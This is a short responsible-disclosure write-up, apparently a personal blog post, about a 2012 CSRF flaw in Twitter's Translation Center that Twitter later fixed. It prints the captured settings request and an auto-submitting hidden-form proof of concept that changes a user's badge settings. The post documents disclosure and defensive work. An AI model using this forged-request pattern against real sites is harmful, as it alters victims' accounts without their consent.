On 28th September 2012, I found a Cross-Site Request Forgery vulnerability on http://translate.twttr.com which is the Twitter Translation Center

While checking the service I landed up on the Accounts Settings page which looked like this.

So we’ve two options here, first one toggles the Twitter Badge setting on Twitter.com and second one toggles the badge related notification.

POST request which disables both the settings looks like this:

POST /user/update HTTP/1.1
Host: translate.twttr.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Proxy-Connection: keep-alive
Referer: http://translate.twttr.com/user/prakharprasad/settings
Cookie: <cookies>
Content-Type: application/x-www-form-urlencoded
Content-Length: 175

utf8=%E2%9C%93&_method=put&
authenticity_token=B6PJGp2Hkm1zi6lVN%2FIueNd7QqlAhIfM5C1pht1MzE8%3D&
user%5Bid%5D=809244&user%5Bbadging_exempted%5D=0&user%5Breceive_badge_email%5D=0

Now in the POST content, parameters of our interest are authenticity_token which is the CSRF prevention token generated by Twitter, user[badging_exempted] and user[receive_badge_email] toggles the badge related settings, user[id] is the user id of user, in my case it was 809244 and is static.

So normally to prevent CSRF on this page authenticity_token needs to be verified on server-side, right ? but this wasn’t the situation when I checked it. The server allowed the form to be submitted without even checking the authenticity_token, which rendered it useless.So we had a CSRF here.

The final Proof-of-Concept code I sent to Twitter Security Team to demonstrate CSRF existence looked like this:

<html>
<head>
</head>
<body onload=document.getElementById('xsrf').submit()>
<form id='xsrf' method="post" action="http://translate.twttr.com/user/update">
<input type='hidden' name='user[badging_exempted]' value='0'></input>
<input type='hidden' name='user[id]=user[id]' value='809244'></input>
<input type='hidden' name='user[receive_badge_email]' value='0'></input>
</form>
</body>
</html>

_jim of Twitter Security Team replied within 1 hour of my initial bug report which said the team is investigating the issue.On 16th October the issue was addressed and then onwards the authenticity_token gets checked on the server-side. Any modification to the token results in an error page.

I’m very thankful to Twitter Team for putting my name along with other white-hats on “Security at Twitter” Page.

Conclusively I would thank _jim who kept me in sync while the issue was investigated and addressed.